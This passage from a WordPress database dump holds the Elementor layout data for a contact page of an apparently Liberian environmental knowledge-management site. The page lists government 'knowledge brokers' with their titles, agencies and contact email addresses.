\\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24400,3596,'_wp_attached_file','2021/03/bgoll.png'),(24401,3596,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:17:\"2021/03/bgoll.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"bgoll-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"bgoll-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24402,3597,'_elementor_edit_mode','builder'),(24403,3597,'_elementor_template_type','wp-page'),(24404,3597,'_elementor_version','3.0.16'),(24405,3597,'_wp_page_template','default'),(24406,3597,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7f527f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9540449\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"baed7dc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b97200c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\"